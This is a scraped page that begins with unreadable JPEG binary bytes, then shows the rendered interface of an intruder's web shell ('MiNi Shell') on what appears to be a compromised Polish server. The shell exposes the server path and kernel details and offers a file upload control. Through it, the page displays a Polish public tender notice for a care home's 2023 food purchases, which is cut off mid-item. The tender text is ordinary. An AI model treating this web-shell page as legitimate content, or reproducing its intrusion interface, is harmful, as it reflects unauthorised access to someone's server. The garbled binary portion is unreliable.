JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221117/0044469201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wraz z sukcesywną dostawą różnych artykułów spożywczych w 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001270196</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr Emila Cyrana 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubliniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34/356-40-04</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">34/356-41-93</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@dpskombatant.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpskombatant.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Opieka społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wraz z sukcesywną dostawą różnych artykułów spożywczych w 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bd5773ec-665d-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00444692</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00068516/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup wraz z sukcesywną dostawą różnych artykułów spożywczych w 2023)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/dpskombatant <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/dpskombatant</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja między Zamawiającym a Wykonawcą, w tym wszelkie oświadczenia, wnioski zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość”: https://platformazakupowa.pl/pn/dpskombatant<br/>2) Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1<br/>SWZ. <br/>3) „Instrukcje dla Wykonawców&#34; są na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>Uwaga:<br/>4) Wykonawca akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie <br/> zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, <br/>5 ) Wykonawca zapoznaje się i stosuje się do Instrukcji składania ofert/wniosków</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami SWZ w załączniku nr 8 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami SWZ w załączniku nr 8 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG.26.4.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 87685,67 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cukier (opakowanie 1kg)	kg	4200<br/>Cukier puder (opakowanie od 400 do 500g)	kg	25<br/>Cukier waniliowy (opakowanie 32g)	szt	250<br/>Fasola sucha kg	80<br/>Groch suchy łuskany kg	100<br/>Kasza kukurydziana gat. I, (opakowanie od 0,4kg do 1kg) kg	150<br/>Kasza gryczana gat. I, (opakowanie od 0,4 kg do 1kg) kg	120<br/>Kasza jęczmienna gat. I, (opakowanie max 1 kg) średnia	kg	250<br/>Kasza manna gat. I, (opakowanie max 1 kg)	kg	430<br/>Mąka pszenna typ 450 lub 500, 1kg	kg	900<br/>Mąka ziemniaczana (opakowanie max 1 kg)	kg	300<br/>Makaron (opakowanie 250g) 4-jajeczny, krajanka rosołowa szt	1000<br/>Płatki jęczmienne (opakowanie od 0,4kg do 1kg), błyskawiczne	kg	50<br/>Płatki ryżowe (opakowanie od 0,25kg do 1kg)	kg	320<br/>Płatki owsiane (opakowanie od 0,4kg do 1kg) błyskawiczne kg	50<br/>Posypka dek. cukrowa kol. (opakowanie 80g)	szt	10<br/>Ryż długoziarnisty gat. I, (opakowanie max 1 kg) całe ziarna	kg	600<br/>Sól spożywcza (opakowanie max 1 kg)	kg	850 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24552,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15611000-4 - Ryż łuskany</p> <p class="mb-0">15612000-1 - Mąka zbożowa lub roślinna i podobne produkty</p> <p class="mb-0">15613380-5 - Płatki owsiane</p> <p class="mb-0">15614000-5 - Ryż przetworzony</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">15894000-1 - Przetworzone produkty spożywcze</p> <p class="mb-0">15899000-6 - Proszek do pieczenia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Waga (%)<br/>1) Cena (P1) 60 %<br/>2) Termin dostawy od złożenia zamówienia (P2) 40 %<br/>Razem (P) 100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej.<br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, wynosi 60,00 pkt.<br/><br/>Waga – 60%<br/> Najniższa cena pośród ofert nieodrzuconych<br/>Wartość punktowa P1 = -------------------------------------------------------- x 100 x waga<br/> Cena (brutto) badanej oferty<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone w kryterium otrzyma maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.<br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Termin dostawy od złożenia zamówienia ” – (P2)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>wynosi 40,00 pkt.<br/>Waga – 40%<br/>Dla kryterium „Termin dostawy od złożenia zamówienia” punkty zostaną przyznane w następujący sposób:<br/>a) wykonawca, który zadeklaruje maksymalny czas dostarczenia zamówienia w terminie 3 dni otrzyma 20 pkt,<br/>b) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 2 dni otrzyma 30 pkt,<br/>c) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 1 dzień otrzyma 40 pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostwy od złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Bazylia (opakowanie 10g)	szt	40<br/>Budyń waniliowy 40g (bez cukru)	szt	170<br/>Czosnek granulowany (opakowanie 20g)	szt	850<br/>Cynamon (opakowanie 20g)	szt	80<br/>Galaretka owocowa (opakowanie od 75 do 80g)	szt	110<br/>Gałka muszkat. miel. (opakowanie 15g)	szt	50<br/>Herbata (opakowanie 100g), czarna, liściasta	kg	150<br/>Imbir mielony (opakowanie 15g)	szt	50<br/>Kakao naturalne ciemne (opakowanie 100g)	szt	100<br/>Kawa zbożowa (opakowanie 500g)	kg	25<br/>Kminek mielony (opakowanie 20g)	szt	80<br/>Kotlety sojowe (opakowanie 100g)	szt	10<br/>Kwasek cytrynowy (opakowanie 50g)	szt	85<br/>Liść laurowy (opakowanie 8g)	szt	180<br/>Lubczyk suszony (opakowanie 10g)	szt	200<br/>Majeranek (opakowanie 10g)	szt	200<br/>Oregano (opakowanie 10g)	szt	40<br/>Papryka słodka (opakowanie 20g)	szt	560<br/>Pieprz czarny (opakowanie 50g), mielony	szt	200<br/>Przyprawa do pierników (opakowanie 40g)	szt	30<br/>Przyprawa warzywna uniwersalna do zup i potraw (opakowanie od 0,4kg do 1kg) zawartość suszonych warzyw min. 15%	kg	360<br/>Rodzynki (opakowanie od 0,2kg do 1kg)	kg	6<br/>Soda oczyszczona (opakowanie 80g)	szt	20<br/>Tymianek (opakowanie 10g)	szt	40<br/>Ziele angielskie (opakowanie 15g)	szt	180<br/>Zioła prowansalskie (opakowanie 10g)	szt	40<br/>Żelatyna (opakowanie 50g)	szt	460 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11399,14 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <p class="mb-0">15831600-8 - Miód</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15871100-5 - Ocet i substytuty octu</p> <p class="mb-0">15871200-6 - Sosy, mieszanki przypraw i mieszanki przypraw korzennych</p> <p class="mb-0">15871250-1 - Musztarda</p> <p class="mb-0">15872000-1 - Zioła i przyprawy korzenne</p> <p class="mb-0">15872100-2 - Pieprz</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Waga (%)<br/>1) Cena (P1) 60 %<br/>2) Termin dostawy od złożenia zamówienia (P2) 40 %<br/>Razem (P) 100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej.<br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, wynosi 60,00 pkt.<br/><br/>Waga – 60%<br/> Najniższa cena pośród ofert nieodrzuconych<br/>Wartość punktowa P1 = -------------------------------------------------------- x 100 x waga<br/> Cena (brutto) badanej oferty<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone w kryterium otrzyma maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.<br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Termin dostawy od złożenia zamówienia ” – (P2)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>wynosi 40,00 pkt.<br/>Waga – 40%<br/>Dla kryterium „Termin dostawy od złożenia zamówienia” punkty zostaną przyznane w następujący sposób:<br/>a) wykonawca, który zadeklaruje maksymalny czas dostarczenia zamówienia w terminie 3 dni otrzyma 20 pkt,<br/>b) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 2 dni otrzyma 30 pkt,<br/>c) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 1 dzień otrzyma 40 pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja L	szt	50500 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15783,42 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami<br/>i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Waga (%)<br/>1) Cena (P1) 60 %<br/>2) Termin dostawy od złożenia zamówienia (P2) 40 %<br/>Razem (P) 100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej.<br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, wynosi 60,00 pkt.<br/><br/>Waga – 60%<br/> Najniższa cena pośród ofert nieodrzuconych<br/>Wartość punktowa P1 = -------------------------------------------------------- x 100 x waga<br/> Cena (brutto) badanej oferty<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone w kryterium otrzyma maksymalną ilość punktów. Pozostałym wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.<br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Termin dostawy od złożenia zamówienia ” – (P2)<br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,<br/>wynosi 40,00 pkt.<br/>Waga – 40%<br/>Dla kryterium „Termin dostawy od złożenia zamówienia” punkty zostaną przyznane w następujący sposób:<br/>a) wykonawca, który zadeklaruje maksymalny czas dostarczenia zamówienia w terminie 3 dni otrzyma 20 pkt,<br/>b) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 2 dni otrzyma 30 pkt,<br/>c) wykonawca, który zadeklaruje skrócony czas dostarczenia zamówienia tj. w terminie 1 dzień otrzyma 40 pkt,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostwy od złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Aromat migdałowy 